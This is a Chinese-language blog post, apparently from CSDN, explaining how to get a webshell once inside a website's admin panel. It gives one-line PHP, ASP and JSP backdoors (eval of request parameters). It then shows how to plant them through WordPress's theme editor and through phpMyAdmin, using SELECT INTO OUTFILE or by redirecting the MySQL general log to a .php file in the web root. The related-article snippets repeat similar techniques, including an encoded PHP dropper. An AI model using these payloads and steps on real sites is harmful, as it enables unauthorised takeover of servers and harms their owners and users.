网站后台拿webshell

最新推荐文章于 2024-08-24 22:42:05 发布
最新推荐文章于 2024-08-24 22:42:05 发布
阅读量2.9k 收藏 4
点赞数
分类专栏: webshell 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42307546/article/details/122723301
版权

当我们通过一些漏洞进入后台之后就要想办法获取网站的控制权限,就是我们所说的拿webshell,这样就可以对网站进行任意编辑,一般都是通过漏洞向目标服务器写入一句话木马来getshell
根据语言的不同,一句话也用多种类型
php一句话
< ?php eval_r($_POST[a])?>
asp一句话

<%eval request(“hihack”)%>或<%execute(request(“hihack”))%>

jsp一句话
<%if(request.getParameter(“f”)!=null)(newjava.io.FileOutputStream (application.getRealPath("\")+request.getParameter(“f”))).write (request.getParameter(“t”).getBytes());%>

wordpress后台拿webshell
通过编辑模板拿webshell
通过选择 主题 编辑 写入一句话
http://www.c2moon.com/wp-admin/theme-editor.php?file=404.php&theme=twentytwentyone

在这里插入图片描述
保存之后即可访问
http://www.xxxx.com/wp-content/themes/twentytwentyone/404.php

phpmyadmin下写shell
直接写进网站根目录

select ‘<?php phpinfo();eval($_POST[cmd]);?>’ into outfile ‘C:/wwwroot/www.c2moon.com/2.php’
在这里插入图片描述
利用mysql日志文件写shell,这个日志可以在mysql里改变它的存放位置,登录phpmyadmin可以修改
这个存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取一个webshell
开启日志记录
SET global general_log = “ON”; 日志保存状态开启;
SET global general_log_file =’/WWWroot/www.c2moon.com/s.php’; 修改日志的保存位置。
在这里插入图片描述
直接访问http://www.c2moon.com/s.php

qq_42307546
关注
专栏目录
Fastadmin后台插件-在线命令管理-getshell
千寻的博客
05-09 4135
注意:需要登录账号或者自己上传一个压缩包,存在漏洞的版本是1.1.0,经过测试1.1.1的已经对输入的进行过滤。我们在接口生成文件处填入 php 的文件名,在文档标题处填入 php 文件。插件管理–在线命令管理—的插件可以直接命令执行。第一步 先上传一个phpinfo,提示成功。第二步 上传一个eval。
网站弱口令拿后台webshell
sineblog的专栏
04-06 1210
我们刚才也发现了 DB admit敏感目录当中有一个test DB的PHP这样一个页面,并且我们可以登录,但是登录是需要密码的,那我们这时候就可以使用对应的弱口令来登录我们在系统当中,弱口令可以分为字母型和数字型,字母型大多数人是使用admin作为登录的密码和用户名,而数字型大多是使用123456作为对应的密码。 下面我们来尝试一下admin进行登录,我们会发现这时候轻松的来进入到该系统的后台。我们在进入系统的后台之后,我们要查找可以写webshell,之后利用该点,来写入咱们想要的这个 web.
利用后台模板获取webshell
diaotuanao1650的博客
01-31 204
目标:win2003+iis6.0+maxcms 4.0(无公害,本地搭建测试) 进入后台找到模板页->管理自定义模板,如下图所示: 添加模板,内容如下:文件名填入:test.asp/ 内容填入:<%eval request("test")%> 在模板管理中找到模板的位置,如下图: 使用菜刀连接即可: 转载于:https://www.cnblog...
FastAdmin目录穿越 CVE-2024-7928
最新发布
iSee857的博客
08-24 622
Bootstrap开发的快速后台开发框架。FastAdmin基于Apache2.0开源协议发布,免费且不限制商业使用,目前被广泛应用于各大行业应用后台管理。其接口lang存在目录穿越漏洞,攻击者可通过该漏洞获取系统库敏感信息。该漏洞已支持yakit插件检测,根据uuid 39894f51-f782-48eb-bb01-d1e0421b8e9c 进行下载。升级至安全版本:1.3.4.20220530。FastAdmin是一款基于。
后台得到webshell方法大汇总
Jessee Woo's Blog
08-05 1407
后台得到webshell技巧大汇总   动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利
后台得到webshell十大技巧大汇总
weixin_34198583的博客
03-17 249
动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站webshell还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外。因此,我们把常用的从后台得到webshell的方法进行了...
后台得到webshell技巧大汇总
软体疯子专栏
12-12 2178
一、直接上传获得webshell这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文 件url应该是http: //forums/images/smiles/下,前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名,bo -blog后台可以可以直接上传.php文件,
网站后台Webshell
01-13
通过注入或者其他途径,获取网站管理员账号和密码后,找到后台登录地址,登录后,寻找后台漏洞上传网页后门,获取网站webshell webshell的作用是方便攻击者,webshell是拥有fso权限,根据fso权限的不用,可以对...
良精南方网站系统拿webshell的教程
03-06
在"南方后台爆oday拿webshell.lxe"这个文件中,很可能是记录了具体的攻击步骤和利用工具。LXE格式可能是一种特殊的日志或数据格式,里面包含了攻击者如何触发漏洞、上传webshell的详细信息,包括HTTP请求构造、...
网站后台编辑器拿webshell
06-08
渗透交流 欢迎大家加入 共同交流 资源共享
后台webshell的常用方法总结
1匹黑马
04-08 1538
后台webshell的常用方法总结 一、直接上传获得webshell 这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文 件url应该是http://forums/images/smiles/下,前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名,bo-blo...
后台得到webshell
qq6641373的专栏
12-12 797
前 言动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除 一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站webshell还有一 步之遥,但还是有许多新手因想不出合适的方法而被拒之门外。因此,我们把常
记一次FastAdmin后台Getshell
qq_45244158的博客
06-28 5692
FastAdmin 是基于ThinkPHP5和Bootstrap的极速后台开发框架。 基于ThinkPHP行为功能实现的插件机制,拥有丰富的插件和扩展,可直接在线安装卸载 。 基于完善的Auth权限控制管理、无限父子级权限分组、可自由分配子级权限、一个管理员可同时属于多个组别 。在某次HVV的打点过程中,发现某资产为FastAdmin搭建。 下图为FastAdmin的报错页面,根据经验可判断该网站FastAdmin搭建。 输入admin.php进入后台登录页面,弱口令进入后台。 进入后台找功能点get
phpbb后台webshell的方法
12-08 2922
导读:   前面所讲述的操作都非常简单,基本上没有什么太大的难度。可是进入了后台要获取Webshell就有点麻烦了,PHPBB旧版本还可以直接添加上传类型为PHP的文件,然后直接上传PHP的后门得到Webshell。可是,最新版本的PHPBB后台已经不允许添加上传类型了,如图5。   图5   可以利用的基本上都限制了,经测试发现部分空间可以添加inc扩展名,然后前台发帖上传扩展为inc的
wordpress 拿webshell
weixin_30344131的博客
08-31 109
进入后台 后台-外观-编辑,找到404的问题插入马,马的代码: <script language=”php”>fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40)....
WordPress拿WebShell
weixin_44023460的博客
07-20 445
在获取Webshell的情况下,对现有信息的分析和利用,有可能获取WordPress后台管理密码。将鼠标移动到上传的Webshell记录上,可以看到有三个按钮“編輯”、“刪除”和“查看”,单击查看即可访问Webshell的具体页面,如图5所示,选择记录中的链接,该链接地址即为真正的Webshell地址。在WordPress管理页面的左边单击“媒体”-“新增媒体案”,接着就会出来一个上传的界面,在该界面中选择“Browser 上傳功能”,如图3所示,直接选择phpWebshell上传即可。
WORDPRESS后台WEBSHELL的2个方法
weixin_34221112的博客
04-01 459
1.本机建立目录“heimian”,把一句话1.php放进去。打包heimian目录为zip文件。WP后台的主题管理,上传主题,安装。 则你的后门路径为:wp-content\themes\heimian\1.php 2.能编辑模板就能拿到shell 首先edit 模板 接着找php的文件,接着备份下他的内容,然后替换成一句话***,接着访问那个页面的地址 /wp-c...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值